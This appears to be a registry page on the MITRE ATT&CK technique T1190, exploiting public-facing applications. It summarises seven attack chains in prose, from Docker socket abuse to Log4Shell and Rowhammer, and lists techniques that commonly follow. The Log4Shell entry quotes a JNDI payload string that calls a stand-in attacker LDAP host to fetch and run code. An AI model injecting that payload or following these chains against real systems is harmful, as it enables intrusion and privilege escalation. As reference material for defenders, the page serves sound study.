Exploit Public-Facing Application
Use vulnerabilities in internet-facing software.
§ Where this technique fits
T1190 is catalogued under the Initial Access tactic of the offensive-security kill chain. It appears in 7 approved dossiers in the registry, at step 2.6 on average.
Authoritative reference: attack.mitre.org/techniques/T1190/.
§ Dossiers chaining this technique
- Step 1 / 5: Renderer compromise → GPU process → vulnerable kernel driver
  After renderer RCE, talk to the GPU process via IPC. The GPU process sends ioctls to a vulnerable graphics driver — full kernel R/W; ring0 from a web page.
- Step 1 / 6: Docker socket exposed in pod → host root
  A workload mounts /var/run/docker.sock for convenience; spawn a container with the host root filesystem mounted, then chroot into it for root on the node.
- Step 1 / 5: Compromised VM → Managed Identity → Subscription Owner
  A VM with an over-privileged system-assigned managed identity is compromised; query IMDS for an Azure AD token, then assign yourself Owner on the subscription.
- Step 2 / 7: Dev workstation → cloud backup keys → encrypted vault store (LastPass 2022)
  An attacker compromised a single LastPass DevOps engineer's home machine via an outdated Plex Media Server, harvested AWS keys for the encrypted-vault backup bucket, and exfiltrated production vault data.
- Step 3 / 6: Log4Shell (CVE-2021-44228) → RCE → lateral
  A `${jndi:ldap://attacker/x}` string in any logged field (User-Agent, X-Forwarded-For) is resolved by vulnerable Log4j 2.x as a JNDI URL; it fetches a Java class from the attacker's LDAP server and runs it as the app user.
- Step 5 / 7: V8 type-confusion 1-day → renderer RCE
  A public V8 type-confusion bug turned into a renderer pop: JS triggers the JIT into mis-compiling a polymorphic site, yielding addrof/fakeobj primitives, then shellcode in a WASM RWX page.
- Step 5 / 6: Rowhammer → bit flip → in-browser sandbox escape
  JavaScript hammers adjacent DRAM rows for tens of seconds; a bit flip in a page-table entry (bad luck for the defender) hands the attacker a write primitive into another mapping, and a RIDL-class chain leads on to native code.
§ What commonly comes next
- 01 · Acquire Infrastructure · T1583 · Resource Development · seen 1×
- 02 · Azure Managed Identity Escalation · C-AZ-MANAGED-ID-ESC · Privilege Escalation · seen 1×
- 03 · Boot or Logon Autostart Execution · T1547 · Persistence · seen 1×
- 04 · Chromium Mojo IPC Confused-Deputy · BRW-CHROME-IPC · Privilege Escalation · seen 1×
- 05 · Docker Socket Exposed · K-DOCKER-SOCK · Initial Access · seen 1×
- 06 · Renderer → Broker Sandbox Escape · BRW-RENDERER-SBX-ESCAPE · Privilege Escalation · seen 1×
- 07 · Valid Accounts · T1078 · Initial Access · seen 1×